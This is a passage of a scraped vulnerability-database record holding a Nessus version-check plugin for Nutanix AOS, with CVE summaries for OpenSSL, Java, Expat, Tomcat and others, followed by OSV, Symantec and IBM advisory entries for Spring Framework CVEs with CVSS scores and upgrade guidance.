consuming client certificates - Hosting providers taking\n certificates or private keys from customers - Certificate authorities parsing certification requests from\n subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that\n use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS\n issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate\n which makes it slightly harder to trigger the infinite loop. However any operation which requires the\n public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-\n signed certificate to trigger the loop during verification of the certificate signature. This issue\n affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the\n 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected\n 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the\n attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content\n to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing\n filenames with two or more newlines where selected content and the target file names are embedded in\n crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write\n arbitrary files on the system. (CVE-2022-1271)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2,\n 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability\n allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE,\n Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized\n ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise\n Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java\n Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes\n from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by\n using APIs in the specified Component, e.g., through a web service which supplies data to the APIs.\n (CVE-2022-21426)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14,\n 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition\n accessible data. Note: This vulnerability applies to Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g.,\n code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also\n be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to\n the APIs. (CVE-2022-21434)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14,\n 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Difficult to exploit\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM\n Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g.,\n code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also\n be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to\n the APIs. (CVE-2022-21443)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.2 and 18; Oracle\n GraalVM Enterprise Edition: 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM\n Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion\n or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition\n accessible data. Note: This vulnerability applies to Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g.,\n code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also\n be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to\n the APIs. (CVE-2022-21449)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14,\n 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in\n unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise\n Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients\n running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code\n (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability\n can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies\n data to the APIs. (CVE-2022-21476)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2,\n 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability\n allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE,\n Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible\n data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java\n Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes\n from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by\n using APIs in the specified Component, e.g., through a web service which supplies data to the APIs.\n (CVE-2022-21496)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u343, 8u333, 11.0.15.1,\n 17.0.3.1, 18.0.1.1; Oracle GraalVM Enterprise Edition: 20.3.6, 21.3.2 and 22.1.0. Easily exploitable\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web\n Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from\n the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs.\n (CVE-2022-21540)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u343, 8u333, 11.0.15.1,\n 17.0.3.1, 18.0.1.1; Oracle GraalVM Enterprise Edition: 20.3.6, 21.3.2 and 22.1.0. Difficult to exploit\n vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise\n Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle\n GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. (CVE-2022-21541)\n\n - Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered\n discarding the request body, exposing the server to HTTP Request Smuggling (CVE-2022-22720)\n\n - addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22822)\n\n - build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22823)\n\n - defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22824)\n\n - lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22825)\n\n - nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22826)\n\n - storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22827)\n\n - Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with\n a nonzero XML_CONTEXT_BYTES. (CVE-2022-23852)\n\n - xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks\n for whether a UTF-8 character is valid in a certain context. (CVE-2022-25235)\n\n - xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters\n into namespace URIs. (CVE-2022-25236)\n\n - A use-after-free vulnerability was found in systemd. This issue occurs due to the on_stream_io() function\n and dns_stream_complete() function in 'resolved-dns-stream.c' not incrementing the reference counting for\n the DnsStream object. Therefore, other functions and callbacks called can dereference the DNSStream\n object, causing the use-after-free when the reference is still used later. (CVE-2022-2526)\n\n - In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames. (CVE-2022-25315)\n\n - If a web application sends a WebSocket message concurrently with the WebSocket connection closing when\n running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the\n application will continue to use the socket after it has been closed. The error handling triggered in this\n case could cause the a pooled object to be placed in the pool twice. This could result in subsequent\n connections using the same object concurrently which could result in data being returned to the wrong use\n and/or other errors. (CVE-2022-25762)\n\n - An issue was discovered in rsync before 3.2.5 that allows malicious remote servers to write arbitrary\n files inside the directories of connecting peers. The server chooses which files/directories are sent to\n the client. However, the rsync client performs insufficient validation of file names. A malicious rsync\n server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the rsync client target directory\n and subdirectories (for example, overwrite the .ssh/authorized_keys file). (CVE-2022-29154)\n\n - The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and\n 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an\n untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and\n integrity protection, it does not protect against all risks associated with running over any untrusted\n network, particularly DoS risks. (CVE-2022-29885)\n\n - VMware Tools (12.0.0, 11.x.y and 10.x.y) contains a local privilege escalation vulnerability. A malicious\n actor with local non-administrative access to the Guest OS can escalate privileges as a root user in the\n virtual machine. (CVE-2022-31676)\n\n - The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious\n XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler\n and execute arbitrary Java bytecode. The Apache Xalan Java project is dormant and in the process of being\n retired. No future releases of Apache Xalan Java to address this issue are expected. Note: Java runtimes\n (such as OpenJDK) include repackaged copies of Xalan. (CVE-2022-34169)\n\n - In Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81 the\n Form authentication example in the examples web application displayed user provided data without\n filtering, exposing a XSS vulnerability. (CVE-2022-34305)\n\n - Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and\n expanded. The standard format for interpolation is ${prefix:name}, where prefix is used to locate an\n instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with\n version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that\n could result in arbitrary code execution or contact with remote servers. These lookups are: - script -\n execute expressions using the JVM script execution engine (javax.script) - dns - resolve dns records -\n url - load values from urls, including from remote servers Applications using the interpolation defaults\n in the affected versions may be vulnerable to remote code execution or unintentional contact with remote\n servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons\n Text 1.10.0, which disables the problematic interpolators by default. (CVE-2022-42889)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://portal.nutanix.com/page/documents/security-advisories/release-advisories/details?id=NXSA-AOS-6.6\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a320a055\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the Nutanix AOS software to recommended version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-45960\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-42889\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:nutanix:aos\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"nutanix_collect.nasl\");\n script_require_keys(\"Host/Nutanix/Data/lts\", \"Host/Nutanix/Data/Service\", \"Host/Nutanix/Data/Version\", \"Host/Nutanix/Data/arch\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::nutanix::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '6.6', 'product' : 'AOS', 'fixed_display' : 'Upgrade the AOS install to 6.6 or higher.', 'lts' : FALSE },\n { 'fixed_version' : '6.6', 'product' : 'NDFS', 'fixed_display' : 'Upgrade the AOS install to 6.6 or higher.', 'lts' : FALSE }\n];\n\nvcf::nutanix::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-05T05:19:08", "description": "\nMultiple vulnerabilities were discovered in libspring-java, a modular\nJava/J2EE application framework. An attacker may execute code, perform\nXST attack, issue unauthorized cross-domain requests or cause a DoS\n(Denial-of-Service) in specific configurations.\n\n\n* [CVE-2018-1270](https://security-tracker.debian.org/tracker/CVE-2018-1270)\nSpring Framework allows applications to expose STOMP over\n WebSocket endpoints with a simple, in-memory STOMP broker through\n the spring-messaging module. A malicious user (or attacker) can\n craft a message to the broker that can lead to a remote code\n execution attack.\n* [CVE-2018-11039](https://security-tracker.debian.org/tracker/CVE-2018-11039)\nSpring Framework allows web applications to change the HTTP\n request method to any HTTP method (including TRACE) using the\n HiddenHttpMethodFilter in Spring MVC. If an application has a\n pre-existing XSS vulnerability, a malicious user (or attacker) can\n use this filter to escalate to an XST (Cross Site Tracing) attack.\n* [CVE-2018-11040](https://security-tracker.debian.org/tracker/CVE-2018-11040)\nSpring Framework allows web applications to enable cross-domain\n requests via JSONP (JSON with Padding) through\n AbstractJsonpResponseBodyAdvice for REST controllers and\n MappingJackson2JsonView for browser requests. Both are not enabled\n by default in Spring Framework nor Spring Boot, however, when\n MappingJackson2JsonView is configured in an application, JSONP\n support is automatically ready to use through the jsonp and\n callback JSONP parameters, enabling cross-domain requests.\n* [CVE-2018-15756](https://security-tracker.debian.org/tracker/CVE-2018-15756)\nSpring Framework provides support for range requests when serving\n static resources through the ResourceHttpRequestHandler, or\n starting in 5.0 when an annotated controller returns an\n org.springframework.core.io.Resource. A malicious user (or\n attacker) can add a range header with a high number of ranges, or\n with wide ranges that overlap, or both, for a denial of service\n attack.\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.3.5-1+deb9u1.\n\n\nWe recommend that you upgrade your libspring-java packages.\n\n\nFor the detailed security status of libspring-java please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/libspring-java>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-23T00:00:00", "type": "osv", "title": "libspring-java - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756", "CVE-2018-11039", "CVE-2018-1270", "CVE-2018-11040"], "modified": "2022-08-05T05:19:05", "id": "OSV:DLA-2635-1", "href": "https://osv.dev/vulnerability/DLA-2635-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-11T05:38:13", "description": "Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-15T19:34:50", "type": "osv", "title": "Denial of Service in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2023-03-11T05:38:11", "id": "OSV:GHSA-FFVQ-7W96-97P7", "href": "https://osv.dev/vulnerability/GHSA-ffvq-7w96-97p7", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-12T05:25:11", "description": "Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-16T17:35:54", "type": "osv", "title": "Moderate severity vulnerability that affects org.springframework:spring-core", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11039"], "modified": "2023-03-12T05:25:10", "id": "OSV:GHSA-9GCM-F4X3-8JPW", "href": "https://osv.dev/vulnerability/GHSA-9gcm-f4x3-8jpw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-12T05:21:49", "description": "Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the \"jsonp\" and \"callback\" JSONP parameters, enabling cross-domain requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-16T17:43:45", "type": "osv", "title": "Moderate severity vulnerability that affects org.springframework:spring-core", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11040"], "modified": "2023-03-12T05:21:36", "id": "OSV:GHSA-F26X-PR96-VW86", "href": "https://osv.dev/vulnerability/GHSA-f26x-pr96-vw86", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-12T05:31:57", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T20:05:59", "type": "osv", "title": "Spring Framework allows applications to expose STOMP over WebSocket endpoints", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270"], "modified": "2023-03-12T05:31:54", "id": "OSV:GHSA-P5HG-3XM3-GCJG", "href": "https://osv.dev/vulnerability/GHSA-p5hg-3xm3-gcjg", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T05:42:26", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.16 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. This CVE addresses the partial fix for CVE-2018-1270 in the 4.3.x branch of the Spring Framework.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T20:28:00", "type": "osv", "title": "Improperly Implemented Security Check for Standard in org.springframework:spring-core", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-1275"], "modified": "2023-03-14T05:42:21", "id": "OSV:GHSA-3RMV-2PG5-XVQJ", "href": "https://osv.dev/vulnerability/GHSA-3rmv-2pg5-xvqj", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2021-06-08T19:08:25", "description": "\n", "cvss3": {}, "published": "2018-10-16T00:00:00", "type": "symantec", "title": "Spring Framework CVE-2018-15756 Denial-Of-Service Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2018-15756"], "modified": "2018-10-16T00:00:00", "id": "SMNTC-105703", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105703", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ibm": [{"lastseen": "2023-02-23T21:46:57", "description": "## Summary\n\nIBM Security Guardium has addressed the following vulnerability. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-15756](<https://vulners.com/cve/CVE-2018-15756>) \n**DESCRIPTION:** Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/151641> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Security Guardium **\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Security Guardium | 10 - 10.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Security Guardium | 10-10.5 | http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=All&function=fixId&fixids=SqlGuard_10.0p620_Bundle_Apr-25-2019&includeSupersedes=0&source=fc \n \n## 